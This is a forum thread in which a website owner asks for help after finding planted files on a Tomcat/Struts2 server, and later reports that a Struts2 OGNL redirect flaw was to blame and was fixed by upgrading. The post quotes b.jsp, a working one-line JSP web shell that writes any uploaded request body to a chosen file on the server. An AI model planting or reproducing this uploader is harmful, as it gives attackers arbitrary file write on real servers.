81,122
社区成员
发帖
与我相关
我的任务
分享struts2 的网站被人植入木马
一个JAVA WEB应用,CentOS 7 + tomcat / struts2 的网站,在ROOT根目录下莫名其妙多了如下几个文件
0 1.txt
b.jsp
bak.jsp
debug.exe
guige.jsp
IFD说锟斤拷锟斤拷.pdf
Json.dll
lndex.jsp
one.jsp
one8.jsp
wget-log
其中 b.jsp 的文件内容如下(其它的有点长,暂时不帖了):
初步估计是 struts2 的漏洞导致的,但没有任何线索
谁能指导一下方向
谢谢!
0 1.txt
b.jsp
bak.jsp
debug.exe
guige.jsp
IFD说锟斤拷锟斤拷.pdf
Json.dll
lndex.jsp
one.jsp
one8.jsp
wget-log
其中 b.jsp 的文件内容如下(其它的有点长,暂时不帖了):
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>初步估计是 struts2 的漏洞导致的,但没有任何线索
谁能指导一下方向
谢谢!
...全文
请发表友善的回复…
发表回复
小灰狼 2015-12-18
- 打赏
- 举报
自己 up 一下
求高人指点
wrong1111 2015-12-18
- 打赏
- 举报
struts2 很久之前就已经暴露出来了BUG,现在我们已经放弃不使用了,直接使用spring的mvc
小灰狼 2015-12-18
- 打赏
- 举报
已经找到问题所在了,是 struts2 的重定向漏洞,通过测试已经发现黑客可以通过一个 url 让服务端执行一段指定的OGNL代码,从而植入木马
升级 jar 之后解决
但是,struts2 的这个漏洞好危险啊,我的系统有网上交易的!
小灰狼 2015-12-17
- 打赏
- 举报
有线索吗
不知道如何查找
u010053498 2015-12-17
- 打赏
- 举报
没有遇到过。
只是猜测
大概了解下这些文件的大体意图(是人家恶作剧玩笑、做测试、还是带有恶意的获取信息,修改信息)
你在你的网站输入表单部分 或者 其他能够上传至服务器的部分 做好校验 如果可以最好能够捕获 登陆人的账号等信息(可能还会来拜访你的)
然后你只能仔细排查 测试了 网上以前依稀看过。
解决了的话 希望到时候@下分享一下。
